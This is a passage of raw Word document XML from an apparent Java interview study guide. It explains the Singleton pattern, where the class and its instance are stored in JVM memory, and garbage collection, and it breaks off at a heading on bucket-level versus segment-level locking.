          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In the Main class (or any other class), you can access the Singleton class by calling Singleton.getInstance(). This ensures that no matter how many times you access it, you'll always get the same instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA71091" w14:textId="77777777" w:rsidR="008C2A8C" w:rsidRPr="00CE4B95" w:rsidRDefault="008C2A8C"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p w14:paraId="73334D0F"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llo from Singleton!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1220361B" w14:textId="77777777" w:rsidR="008C2A8C" w:rsidRPr="00CE4B95" w:rsidRDefault="008C2A8C"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ue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C874CF" w14:textId="77777777" w:rsidR="008C2A8C" w:rsidRPr="00CE4B95" w:rsidRDefault="008C2A8C"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Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D362295" w14:textId="77777777" w:rsidR="008C2A8C" w:rsidRPr="00CE4B95" w:rsidRDefault="008C2A8C" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Singleton class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ensures only </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>one instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the class is created throughout the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D991DB" w14:textId="77777777" w:rsidR="008C2A8C" w:rsidRPr="00CE4B95" w:rsidRDefault="008C2A8C" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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 access the instance using the getInstance() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BD75B3" w14:textId="77777777" w:rsidR="008C2A8C" w:rsidRPr="00CE4B95" w:rsidRDefault="008C2A8C" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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instance is lazily initialized, meaning it is only created when it is needed for the first time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7571A9D0" w14:textId="6B6D8E53" w:rsidR="00342FA5" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0028064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24F689F">
          <v:rect id="_x0000_i1232" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F4AECA" w14:textId="0A91656E" w:rsidR="00EB7E74" w:rsidRPr="00CE4B95" w:rsidRDefault="009308A9" w:rsidP="001C0DAC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="87" w:name="_Toc196307567"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Where will the Singleton class be stored in memory</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E74" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
    </w:p>
    <w:p w14:paraId="2467815F" w14:textId="2A8784A4" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF" w:rsidP="00F61E7C">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the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Singleton class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is stored in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Heap memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because it is an object created during runtime. Specifically, the instance of the Singleton class is created in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>heap memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when it is first accessed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DAD23C" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF"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s a detailed breakdown of how and where the Singleton class is stored in memory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C00E88" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF"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Class Definition (in the Method Area/Metaspace):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFA3CDE" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Singleton class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is loaded into memory by the JVM, its class definition (metadata) is stored in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Method Area</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (in older versions of Java, this was part of the PermGen space; from Java 8 onwards, it's part of Metaspace).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FDD2BB" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Method Area/Metaspace</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> contains information about the class, including its methods, fields, and other metadata. This is shared across all instances of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028A5815" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF"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Singleton Instance (in the Heap Memory):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1061D2C2" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Singleton instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> itself is stored in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Heap memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. The heap is where all objects in Java are allocated at runtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DF07A4" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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call Singleton.getInstance(), the first time, the instance is created in the heap memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E34DAAB" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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instance is already created, it simply returns the reference to the existing instance (no new object creation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB5C5E2" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF"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Instance Reference:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6475615E" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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reference to the Singleton instance (e.g., instance in the getInstance() method) is stored in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Heap memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as well.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06252D24" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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reference variable is typically a static variable in the Singleton class, meaning it's shared among all invocations of the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B417752" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF"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Garbage Collection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798B7C4C" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ingleton instance, like other objects in Java, will remain in memory until it is no longer referenced and is eligible for garbage collection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772C64F2" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ce the Singleton class is designed to ensure only one instance is created and it persists throughout the application's life, this instance typically lives as long as the application is running. It will be collected only if there are no references to it and the class loader can be garbage collected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D298322" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF"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3C98ACDB" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF"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ingleton {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482C30FD" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF"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tatic reference to the single instance of the class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6260352C" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF"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atic Singleton instance;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE4BBF8" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF" w:rsidP="0028064B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="250BCA8C" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF"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vate constructor to prevent instantiation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50663234" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF"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ingleton() { }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA0CA75" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF" w:rsidP="0028064B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6283D4FA" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF"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Method to get the instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768E5901" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF"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Singleton getInstance() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF96191" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF"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instance == null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7320C839" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF"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stance = new Singleton(); // Created in the heap memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAE16A9" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A83738" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF"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instance; // Reference is returned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005B59C8" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF"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B8FF9A4" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF"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D68D3F4" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF" w:rsidP="0028064B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69983BE3" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF"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103E643C" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF"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4498136F" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF"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ccessing Singleton instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192E67A9" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF"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ingleton singleton1 = Singleton.getInstance();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244B8C2C" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF"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ingleton singleton2 = Singleton.getInstance();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014D3C4B" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF"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B0EC797" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF"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ingleton1 == singleton2); // true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510BA421" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF"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6A454C6" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF"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9551CBA" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF"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Memory Storage Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413BDB85" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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lass Metadata</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like method definitions, fields, etc.) is stored in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Method Area</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Metaspace).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30614FE3" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ingleton instance object</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is stored in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Heap memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204297C0" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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reference to the Singleton instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is stored in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Heap memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C463E3" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF"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Points:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A38CBB6" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Singleton instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is only created once and resides in the heap memory after the first call to getInstance().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEBF38F" w14:textId="77777777" w:rsidR="00F600CF" w:rsidRPr="00CE4B95" w:rsidRDefault="00F600CF" w:rsidP="0028064B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Singleton class's static reference</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., instance field) resides in the heap memory but is shared across all threads, which allows the instance to be accessed globally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D2C88F" w14:textId="36CFB372" w:rsidR="00342FA5" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0028064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421FED">
          <v:rect id="_x0000_i1233" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5302B770" w14:textId="3B5693DF" w:rsidR="006151C3" w:rsidRPr="00CE4B95" w:rsidRDefault="00A9093D" w:rsidP="001C0DAC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="88" w:name="_Toc196307568"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between bucket level and segment level locking</w:t>
      </w:r>
      <w:r w:rsidR="006151C3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="88"/>
    </w:p>
    <w:p w14:paraId="5068E8F6" w14:textId="3ACF7844" w:rsidR="00A76D6E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A76D6E" w:rsidP="00BD5387">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ucket-level locking</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segment-level locking</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
